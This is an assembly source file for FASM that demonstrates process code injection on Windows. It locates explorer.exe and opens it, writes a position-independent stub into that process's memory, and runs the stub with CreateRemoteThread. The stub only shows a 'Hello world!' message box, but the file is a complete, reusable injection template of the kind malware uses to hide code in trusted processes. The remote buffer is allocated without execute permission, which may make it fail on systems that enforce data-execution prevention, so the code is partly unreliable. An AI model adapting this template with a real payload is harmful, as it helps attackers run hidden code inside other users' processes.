; -=-=-=-=-=-=-=-=-=-=-=-=-=-
;   Code injection in FASM
;      Created by Ct757
; -=-=-=-=-=-=-=-=-=-=-=-=-=-
;
; Use FASM to compile this shit


format PE GUI 4.0
entry start

  include '%fasminc%\win32a.inc'


section '.code' code readable writeable executable


    target_name     db 'explorer.exe',0


;...............[INJECT CODE]..................;

remote_thread:

    call    .delta
  .delta:
    pop     ebp
    sub     ebp,.delta

    xor     esi,esi

    lea     eax,[ebp+_user32]
    push    eax
    call    [ebp+pLoadLibrary]

    push    esi
    lea     eax,[ebp+_title]
    push    eax
    lea     eax,[ebp+_message]
    push    eax
    push    esi
    call    [ebp+pMessageBox]

    ret

  .data:

    pMessageBox     dd 0
    pLoadLibrary    dd 0

    _user32	    db 'USER32.DLL',0
    _message	    db 'Hello world!',0
    _title	    db 'Injected',0

thread_end:

;...............[END INJECT CODE]..............;

    p_ent	    PROCESSENTRY32

find_target:
    xor     esi,esi

 .shot:
    mov     [p_ent.dwSize],sizeof.PROCESSENTRY32
    invoke  CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,esi
    inc     eax
    je	    .not_found
    dec     eax
    xchg    eax,edi

    invoke  Process32First,edi,p_ent

 .next_prc:
    xchg    eax,ecx
    jecxz   .not_found

    invoke  lstrcmpi,p_ent.szExeFile,target_name
    xchg    eax,ecx
    jecxz   .found

    invoke  Process32Next,edi,p_ent
    jmp     .next_prc

 .found:
    invoke  CloseHandle,edi
    mov     eax,[p_ent.th32ProcessID]
    ret

 .not_found:
    xor     eax,eax
    ret

inject_code:
    xor     esi,esi
    invoke  OpenProcess,PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,esi,eax

    xchg    eax,ecx
    jecxz   .exit

    xchg    ecx,edi

    invoke  VirtualAllocEx,edi,esi,thread_end-remote_thread,MEM_COMMIT,PAGE_READWRITE
    xchg    eax,ecx
    jecxz   .close_h

    xchg    ecx,ebp

    invoke  WriteProcessMemory,edi,ebp,remote_thread,thread_end-remote_thread,esi

    dec     eax
    test    eax,eax
    jnz     .close_h
    inc     eax

    invoke  CreateRemoteThread,edi,esi,esi,ebp,ebp,esi,esi

  .close_h:
    invoke  CloseHandle,edi

  .exit:
    ret

get_apis:
    mov     edi,[LoadLibrary]
    mov     [pLoadLibrary],edi

    mov     edi,[MessageBox]
    mov     [pMessageBox],edi

    ret

start:
    call    find_target
    test    eax,eax
    je	    .exit

    call    get_apis

    call    inject_code

  .exit:
    push    0
    call    [ExitProcess]


section '.idata' data import readable

  library kernel32,'KERNEL32.DLL',\
	  user32,'USER32.DLL'

  include '%fasminc%\APIA\kernel32.inc'
  include '%fasminc%\APIA\user32.inc'